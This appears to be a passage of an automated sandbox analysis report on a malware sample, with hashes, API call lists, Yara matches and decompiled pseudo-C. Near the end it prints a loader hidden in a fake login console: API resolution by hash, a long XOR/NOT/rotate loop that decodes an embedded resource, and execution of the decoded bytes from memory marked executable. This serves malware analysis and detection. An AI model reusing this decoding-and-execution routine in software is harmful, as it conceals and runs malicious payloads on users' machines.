                                                • Opcode Fuzzy Hash: 09d414a77421dbdd89e62810ac6d7e59c24b4fff9ae73138f52457d886109a6e
                                                • Instruction Fuzzy Hash: 2D90026170114003D640719D55586068085F7F1341F51D011E0444554CE9558C566272
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 26bcf5442626d618b99c63ee6fd0c15767d493c9f257c76361e7c9d79cb54799
                                                • Instruction ID: 18cfeaf8a2a0ec6feaf439d30eb5bc0afc8fd4bc141d152670aaf82bad464aef
                                                • Opcode Fuzzy Hash: 26bcf5442626d618b99c63ee6fd0c15767d493c9f257c76361e7c9d79cb54799
                                                • Instruction Fuzzy Hash: 4490027160114402D60065DD55486464085A7F0341F51D011A5054555ED6A58C917171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d495a87c1920c2eea6265a3f97ad9ebd0b17ef340f85627fed5bbbe470eff16e
                                                • Instruction ID: a0c45e13738d5fabed1b1cfdbcf9cae56bc8adb731b9aed052ce54f9536caa14
                                                • Opcode Fuzzy Hash: d495a87c1920c2eea6265a3f97ad9ebd0b17ef340f85627fed5bbbe470eff16e
                                                • Instruction Fuzzy Hash: 759002716011C802D610619D854474A4085A7E0341F55C411A4454658DD6D58C917171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5cd20463f2f70ec0bbfe31e3b54edd90e0db991de1029884a92c4178199edc66
                                                • Instruction ID: c897f274edb9455b815b7dd97b321f90ce1850f9e55dc6f3396aa5c0efe021c0
                                                • Opcode Fuzzy Hash: 5cd20463f2f70ec0bbfe31e3b54edd90e0db991de1029884a92c4178199edc66
                                                • Instruction Fuzzy Hash: EE90027160154402D600619D495470B4085A7E0342F51C011A1194555DD6658C5175B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d29a375294d29d285c9e943f8cee2f4d979ca0060747936feecf888a691acedd
                                                • Instruction ID: 88bee5c6dc9f7cc9b0ed2ff71b380d331070bbf63e6aebf606bb411626381403
                                                • Opcode Fuzzy Hash: d29a375294d29d285c9e943f8cee2f4d979ca0060747936feecf888a691acedd
                                                • Instruction Fuzzy Hash: AA900261A0114042464071AD89849068085BBF1251751C121A09C8550DD5998C6566B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 03ef3139e7c6592d553e715599e6b9e0ae1cd1d8dfcc2d03a03a629aa4c3d9e8
                                                • Instruction ID: 02935208cdde4033a79bdbe3c19acd5445f4315883defa3b4f6b8d3176fd5c05
                                                • Opcode Fuzzy Hash: 03ef3139e7c6592d553e715599e6b9e0ae1cd1d8dfcc2d03a03a629aa4c3d9e8
                                                • Instruction Fuzzy Hash: 5F90026161194042D70065AD4D54B074085A7E0343F51C115A0184554CD9558C616571
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bdafa3da06f10dc14996ff65e9ec304be3977eb3bb17e43e3a48e0e42eac7a35
                                                • Instruction ID: 1672c723c00f10a6475c6d3af1ccd254a0ef9060254c9cb19f649da410181b1c
                                                • Opcode Fuzzy Hash: bdafa3da06f10dc14996ff65e9ec304be3977eb3bb17e43e3a48e0e42eac7a35
                                                • Instruction Fuzzy Hash: 7E90027160114802D680719D454464A4085A7E1341F91C015A0055654DDA558E5977F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
                                                • Instruction ID: 432e1ce9d525f57aefaca7daa4fe6280bf22d9d084bd04ba996dfdd8e8b53d12
                                                • Opcode Fuzzy Hash: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
                                                • Instruction Fuzzy Hash: 4F210CB2D4020857CB25D665AD42BEF737CAB54318F04017FE949A3182F638BE49CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitFreeHeapProcess
                                                • String ID:
                                                • API String ID: 1180424539-0
                                                • Opcode ID: 250ef18c556ba02e814dab3b4aecc19de277be39554cece91c375ae2bac7ee4d
                                                • Instruction ID: 547a9b8b68c9010547b339b3cb529d0b91f2f117204a37f4204373e2dfc76596
                                                • Opcode Fuzzy Hash: 250ef18c556ba02e814dab3b4aecc19de277be39554cece91c375ae2bac7ee4d
                                                • Instruction Fuzzy Hash: FE016D752102047BD724DF69CC85FEB37A9EF48750F058199BA596B382C631EA11CBF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 28%
                                                			E0041A233(void* __ebx, intOrPtr __edx, void* _a8, void* _a12, void* _a16, void* _a20) {
                                                				char _v1;
                                                				char* _t29;
                                                
                                                				asm("scasd");
                                                				asm("out 0xeb, al");
                                                				_t29 =  &_v1;
                                                				 *((intOrPtr*)(__ebx + 0x35e0edd3)) = __edx;
                                                				asm("aad 0x86");
                                                				if (_t29 >= 0) goto L4;
                                                				_push(_t29);
                                                			}





                                                0x0041a233
                                                0x0041a234
                                                0x0041a236
                                                0x0041a237
                                                0x0041a23d
                                                0x0041a23f
                                                0x0041a240

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitFreeHeapProcess
                                                • String ID:
                                                • API String ID: 1180424539-0
                                                • Opcode ID: ad134962489c4b0be910909cb3bc786af8e452fdec099d3a1fbaeeacbbdd7ab3
                                                • Instruction ID: 9f10a431267118275e9ad7371f05e8955491781adb6bddcdcab8ee9240746023
                                                • Opcode Fuzzy Hash: ad134962489c4b0be910909cb3bc786af8e452fdec099d3a1fbaeeacbbdd7ab3
                                                • Instruction Fuzzy Hash: 2CF0B4B52042146BCB24EF65CD45E973B6CEF89350F418699FD494B342C230E921CBF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00407E80(void* _a4, struct _SECURITY_DESCRIPTOR* _a8) {
                                                				DWORD* _t12;
                                                				void* _t15;
                                                				struct _SECURITY_DESCRIPTOR* _t23;
                                                				int _t24;
                                                				void* _t32;
                                                				DWORD** _t36;
                                                				void* _t37;
                                                				void* _t38;
                                                				void* _t39;
                                                
                                                				_t36 = _a8;
                                                				if(_t36 != 0) {
                                                					_t32 = _a4;
                                                					 *_t36 = 0;
                                                					_a8 = 0x10000;
                                                					_t12 = E0041B910(_t32, 0, 0x10000, 0x1000, 4); // executed
                                                					_t38 = _t37 + 0x14;
                                                					 *_t36 = _t12;
                                                					if(_t12 == 0) {
                                                						L6:
                                                						return 0;
                                                					} else {
                                                						while(1) {
                                                							_t15 = E00419A90(_t32, 5,  *_t36, _a8, 0); // executed
                                                							_t39 = _t38 + 0x14;
                                                							if(_t15 != 0xc0000004) {
                                                								break;
                                                							}
                                                							E0041A190(_t32,  *_t32, _t36,  &_a8, 0x8000); // executed
                                                							_push(4);
                                                							_t23 = _a8 + 0x10000;
                                                							_push(0x1000);
                                                							 *_t36 = 0;
                                                							_a8 = _t23;
                                                							_t24 = SetUserObjectSecurity(_t32, 0, _t23); // executed
                                                							_t38 = _t39 + 0x28;
                                                							 *_t36 = _t24;
                                                							if(_t24 != 0) {
                                                								continue;
                                                							} else {
                                                								goto L6;
                                                							}
                                                							goto L10;
                                                						}
                                                						if(_t15 >= 0) {
                                                							_t36[3] =  *_t36;
                                                							_t36[1] = _a8;
                                                							return 1;
                                                						} else {
                                                							E0041A190(_t32,  *_t32, _t36,  &_a8, 0x8000);
                                                							 *_t36 = 0;
                                                							return 0;
                                                						}
                                                					}
                                                				} else {
                                                					return 0;
                                                				}
                                                				L10:
                                                			}












                                                0x00407e84
                                                0x00407e89
                                                0x00407e91
                                                0x00407ea3
                                                0x00407ea9
                                                0x00407eb0
                                                0x00407eb5
                                                0x00407eb8
                                                0x00407ebc
                                                0x00407f18
                                                0x00407f1d
                                                0x00407ec0
                                                0x00407ec0
                                                0x00407ecc
                                                0x00407ed1
                                                0x00407ed9
                                                0x00000000
                                                0x00000000
                                                0x00407ee9
                                                0x00407ef1
                                                0x00407ef3
                                                0x00407ef8
                                                0x00407f01
                                                0x00407f07
                                                0x00407f0a
                                                0x00407f0f
                                                0x00407f12
                                                0x00407f16
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407f16
                                                0x00407f20
                                                0x00407f49
                                                0x00407f4d
                                                0x00407f57
                                                0x00407f22
                                                0x00407f30
                                                0x00407f39
                                                0x00407f43
                                                0x00407f43
                                                0x00407f20
                                                0x00407e8b
                                                0x00407e8f
                                                0x00407e8f
                                                0x00000000

                                                APIs
                                                • SetUserObjectSecurity.USER32 ref: 00407F0A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ObjectSecurityUser
                                                • String ID:
                                                • API String ID: 3368538905-0
                                                • Opcode ID: acb12e98be2c78d1dd8805e6af08001e4c68e39effe5ce95b08ee45ff6ef72b7
                                                • Instruction ID: 0e1586888c10476cb595f787793831b7260d85e8fa1732002c5f65dd8b7c06a6
                                                • Opcode Fuzzy Hash: acb12e98be2c78d1dd8805e6af08001e4c68e39effe5ce95b08ee45ff6ef72b7
                                                • Instruction Fuzzy Hash: D221A4B16402057BE720DE59DC41FABB3A8DF54764F10842FFA88DB281E7B4E9808B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 63%
                                                			E004082E8(intOrPtr* __esi, intOrPtr _a4, long _a8) {
                                                				char _v67;
                                                				char _v68;
                                                				void* _t12;
                                                				int _t13;
                                                				signed char _t14;
                                                				long _t20;
                                                				void* _t23;
                                                				int _t26;
                                                				void* _t29;
                                                				void* _t31;
                                                
                                                				_t23 = __esi +  *__esi;
                                                				asm("cli");
                                                				asm("sbb byte [ebp+0x55942fa6], 0x8b");
                                                				_t29 = _t31;
                                                				_push(_t23);
                                                				_v68 = 0;
                                                				E0041BA30( &_v67, 0, 0x3f);
                                                				E0041C5D0( &_v68, 3);
                                                				_t25 = _a4 + 0x1c;
                                                				_t12 = E0040ACD0(_a4 + 0x1c, _a4 + 0x1c,  &_v68); // executed
                                                				_t13 = E00414E20(_t25, _t12, 0, 0, 0xc4e7b6d6);
                                                				_t26 = _t13;
                                                				if(_t26 != 0) {
                                                					_t20 = _a8;
                                                					_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
                                                					_t38 = _t13;
                                                					if(_t13 == 0) {
                                                						_t14 = E0040A460(_t38, 1, 8);
                                                						_t13 =  *_t26(_t20, 0x8003, _t29 + (_t14 & 0x000000ff) - 0x40, _t13);
                                                					}
                                                				}
                                                				return _t13;
                                                			}













                                                0x004082e8
                                                0x004082ea
                                                0x004082eb
                                                0x004082f1
                                                0x004082f6
                                                0x004082ff
                                                0x00408303
                                                0x0040830e
                                                0x0040831a
                                                0x0040831e
                                                0x0040832e
                                                0x00408333
                                                0x0040833a
                                                0x0040833d
                                                0x0040834a
                                                0x0040834c
                                                0x0040834e
                                                0x00408355
                                                0x0040836b
                                                0x0040836b
                                                0x0040836d
                                                0x00408372

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 09bf45a94f708fda496999d8cc4cc41b8bf14f77805b9a6c0b5e4b80a5621006
                                                • Instruction ID: f48dc97511caad6c3d3801281bc7feabef1a3c7d088df38675d2db30e286f357
                                                • Opcode Fuzzy Hash: 09bf45a94f708fda496999d8cc4cc41b8bf14f77805b9a6c0b5e4b80a5621006
                                                • Instruction Fuzzy Hash: 74012D31A803287BEB20A6A58C02FFE7B1CAF40F55F04411EFF04BA1C1D6A9690547E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
                                                				char _v67;
                                                				char _v68;
                                                				void* _t12;
                                                				intOrPtr* _t13;
                                                				int _t14;
                                                				signed char _t15;
                                                				long _t21;
                                                				intOrPtr* _t25;
                                                				void* _t26;
                                                
                                                				_v68 = 0;
                                                				E0041BA30( &_v67, 0, 0x3f);
                                                				E0041C5D0( &_v68, 3);
                                                				_t24 = _a4 + 0x1c;
                                                				_t12 = E0040ACD0(_a4 + 0x1c, _a4 + 0x1c,  &_v68); // executed
                                                				_t13 = E00414E20(_t24, _t12, 0, 0, 0xc4e7b6d6);
                                                				_t25 = _t13;
                                                				if(_t25 != 0) {
                                                					_t21 = _a8;
                                                					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                					_t33 = _t14;
                                                					if(_t14 != 0) {
                                                						L5:
                                                						return _t14;
                                                					}
                                                					_t15 = E0040A460(_t33, 1, 8);
                                                					_t14 =  *_t25(_t21, 0x8003, _t26 + (_t15 & 0x000000ff) - 0x40, _t14);
                                                					goto L5;
                                                				}
                                                				return _t13;
                                                			}












                                                0x004082ff
                                                0x00408303
                                                0x0040830e
                                                0x0040831a
                                                0x0040831e
                                                0x0040832e
                                                0x00408333
                                                0x0040833a
                                                0x0040833d
                                                0x0040834a
                                                0x0040834c
                                                0x0040834e
                                                0x0040836d
                                                0x00000000
                                                0x0040836d
                                                0x00408355
                                                0x0040836b
                                                0x00000000
                                                0x0040836b
                                                0x00408372

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
                                                • Instruction ID: 1050077c77294267169ebb916dfae3a1405fb9879d8789690f6f999e3cf74240
                                                • Opcode Fuzzy Hash: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
                                                • Instruction Fuzzy Hash: AD01D831A8032877E720A6959C03FFE771C6B40F54F044019FF04BA1C1E6A8690546EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 26%
                                                			E004082B3(void* __eax, void* __ecx, void* __edx, void* __esi, void* __eflags) {
                                                				int _t10;
                                                				signed char _t11;
                                                				long _t20;
                                                				int _t25;
                                                				void* _t28;
                                                
                                                				asm("int 0xd3");
                                                				if(__eflags >= 0) {
                                                					_t10 = E00414E20(__eax, __esi, 0, 0, 0xc4e7b6d6);
                                                					_t25 = _t10;
                                                					__eflags = _t25;
                                                					if(_t25 != 0) {
                                                						_t20 =  *(_t28 + 0xc);
                                                						_t10 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
                                                						__eflags = _t10;
                                                						if(__eflags == 0) {
                                                							_t11 = E0040A460(__eflags, 1, 8);
                                                							_t10 =  *_t25(_t20, 0x8003, _t28 + (_t11 & 0x000000ff) - 0x40, _t10);
                                                						}
                                                					}
                                                					return _t10;
                                                				} else {
                                                					asm("daa");
                                                					if(__eflags > 0) {
                                                						asm("clc");
                                                						asm("std");
                                                						asm("invalid");
                                                						_push(__ecx);
                                                						E0041B9B0();
                                                						return 0;
                                                					} else {
                                                						__esi = __eax;
                                                						__eax = E0041B320(__ecx);
                                                						__eax = __eax + __esi + 0x1000;
                                                						__esi = __esi;
                                                						return __eax; // executed
                                                					}
                                                				}
                                                			}








                                                0x004082b4
                                                0x004082b6
                                                0x0040832e
                                                0x00408333
                                                0x00408338
                                                0x0040833a
                                                0x0040833d
                                                0x0040834a
                                                0x0040834c
                                                0x0040834e
                                                0x00408355
                                                0x0040836b
                                                0x0040836b
                                                0x0040836d
                                                0x00408372
                                                0x004082b8
                                                0x004082b8
                                                0x004082b9
                                                0x00408268
                                                0x00408269
                                                0x0040826a
                                                0x0040826c
                                                0x0040826e
                                                0x0040827e
                                                0x004082bb
                                                0x004082ce
                                                0x004082d0
                                                0x004082d5
                                                0x004082dc
                                                0x004082dd
                                                0x004082dd
                                                0x004082b9

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 31d608a49065a52b608442d183ce0a90ff4413927e247e9710dd0310ee6f55e1
                                                • Instruction ID: bdd69d18f858de0f0da4d4c3ee629ba13c87c32b621c0d2d7e69cf2947c9496e
                                                • Opcode Fuzzy Hash: 31d608a49065a52b608442d183ce0a90ff4413927e247e9710dd0310ee6f55e1
                                                • Instruction Fuzzy Hash: 56F02836A406243AE62065756C03FFE62589B85F55F05407FFF40FA2C1EAA9982542E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction ID: 8b4701b4f03220052e2b3b5ed4c672ef58e2eb60ff823c8fb6afa074398e137c
                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction Fuzzy Hash: DCE04FB12102046BD714DF59CC45EE777ADEF88750F014559FE0857241C630F910CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A200(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                				void* _t10;
                                                				void* _t15;
                                                
                                                				E0041AB30(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                			}





                                                0x0041a217
                                                0x0041a22d
                                                0x0041a231

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A22D
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction ID: 4224f920e4464a65d08b1d76aaa125f94db740d8927d38e6c7d6b62f4195d12c
                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction Fuzzy Hash: 58E012B1210208ABDB14EF99CC41EA777ADAF88664F118559BA085B242C630F9118AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A3A0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                				int _t10;
                                                				void* _t15;
                                                
                                                				E0041AB30(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                			}





                                                0x0041a3ba
                                                0x0041a3d0
                                                0x0041a3d4

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction ID: 9e479b2eaf60326b59b5a15a73b63e8f9b290ab663b6f1255dfa49a1ae2fc0e3
                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction Fuzzy Hash: DFE01AB12002086BDB10DF49CC85EE737ADAF88650F018155BA0857241C934F8118BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction ID: ec4c192c261470033b7d3fff11050ba2ce0bed15fbfecc5592b4580303735d53
                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction Fuzzy Hash: 29D017726142187BD620EB99CC85FD777ACDF487A0F0181A9BA1C6B242C531BA108AE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1662bd115923131e5d17dc8aa0857c51b5e8532772756ccf034c0641cec94cbd
                                                • Instruction ID: aaefb60808a7f44ad45222764507eae94aad405ed0a2fa079d827d119c3ce53d
                                                • Opcode Fuzzy Hash: 1662bd115923131e5d17dc8aa0857c51b5e8532772756ccf034c0641cec94cbd
                                                • Instruction Fuzzy Hash: D1B09B71D015C5C5DB11E7A44708737794477D0749F16C051D1060641B4778C491F5B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 55%
                                                			E01231040(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				signed int _v5;
                                                				signed int _v12;
                                                				struct HINSTANCE__* _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				intOrPtr _v44;
                                                				char _v48;
                                                				char _v1048;
                                                				char _v7712;
                                                				void* __ebp;
                                                				void* _t133;
                                                				void* _t134;
                                                				void* _t176;
                                                				void* _t177;
                                                				void* _t178;
                                                				void* _t179;
                                                				void* _t180;
                                                				void* _t184;
                                                
                                                				_t184 = __fp0;
                                                				_t177 = __esi;
                                                				_t176 = __edi;
                                                				_t134 = __ecx;
                                                				E01238770(0x1e1c);
                                                				_v16 = GetModuleHandleW(L"Kernel32.dll");
                                                				E01236B80(_t134);
                                                				_v44 = E01236A70(_v16, 0xb616c5d9);
                                                				_v40 = E01236A70(_v16, 0xe0baa99);
                                                				_v32 = E01236A70(LoadLibraryW(L"User32.dll"), 0x23fdef72);
                                                				_v24 = E01236A70(LoadLibraryW(L"User32.dll"), 0x695c9378);
                                                				_v36 = E01236A70(_v16, 0x9347c911);
                                                				_v28 = _v36(0, L"IEUCIZEO", 0xa);
                                                				_v20 = _v40(0, _v28);
                                                				E01237AE0( &_v7712, _v20, 0x1a05);
                                                				_t180 = _t179 + 0xc;
                                                				_v12 = 0;
                                                				while(_v12 < 0x1a05) {
                                                					_v5 =  *((intOrPtr*)(_t178 + _v12 - 0x1e1c));
                                                					_v5 = _v5 & 0x000000ff ^ _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = _v5 & 0x000000ff ^ 0x00000086;
                                                					_v5 = (_v5 & 0x000000ff) + 0x17;
                                                					_v5 = _v5 & 0x000000ff ^ _v12;
                                                					_v5 = (_v5 & 0x000000ff) + _v12;
                                                					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
                                                					_v5 =  ~(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) - _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = _v5 & 0x000000ff ^ _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) - 0x4c;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) + 0x13;
                                                					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
                                                					_v5 = (_v5 & 0x000000ff) - _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					 *((char*)(_t178 + _v12 - 0x1e1c)) = _v5;
                                                					_v12 = _v12 + 1;
                                                				}
                                                				_v44( &_v7712, 0x1a05, 0x40,  &_v48);
                                                				_v32(_v24(0, 0,  &_v7712,  &_v1048, 0, 0, 0, 0, 0));
                                                				E012321E0( &_v7712, _t176, _t177, __eflags);
                                                				while(1) {
                                                					E01231380(_t176, _t177, __eflags, 8, 9, 0x46, 0xd);
                                                					E012312B0(0xa, 0xb);
                                                					_push("Press A to Log in as ADMINISTRATOR or S to log in as STAFF\n\n\n\t\t\t\t\t");
                                                					E0123715C(_t133, _t176, _t177, __eflags);
                                                					_t180 = _t180 + 4;
                                                					__eflags = (_v5 & 0x000000ff) - 0x41;
                                                					if((_v5 & 0x000000ff) == 0x41) {
                                                						break;
                                                					}
                                                					__eflags = (_v5 & 0x000000ff) - 0x61;
                                                					if((_v5 & 0x000000ff) != 0x61) {
                                                						__eflags = (_v5 & 0x000000ff) - 0x53;
                                                						if((_v5 & 0x000000ff) == 0x53) {
                                                							L10:
                                                							E01233610(_t133, _t176, _t177, _t184);
                                                						} else {
                                                							__eflags = (_v5 & 0x000000ff) - 0x73;
                                                							if((_v5 & 0x000000ff) != 0x73) {
                                                								__eflags = (_v5 & 0x000000ff) - 0x1b;
                                                								if((_v5 & 0x000000ff) == 0x1b) {
                                                									E012377B1(0);
                                                								}
                                                								__eflags = 1;
                                                								if(1 != 0) {
                                                									continue;
                                                								}
                                                							} else {
                                                								goto L10;
                                                							}
                                                						}
                                                					} else {
                                                						break;
                                                					}
                                                					L14:
                                                					__eflags = 0;
                                                					return 0;
                                                				}
                                                				E012322F0(_t176, _t177, _t184);
                                                				goto L14;
                                                			}

























                                                0x01231040
                                                0x01231040
                                                0x01231040
                                                0x01231040
                                                0x01231048
                                                0x01231058
                                                0x0123105b
                                                0x0123106e
                                                0x0123107f
                                                0x01231098
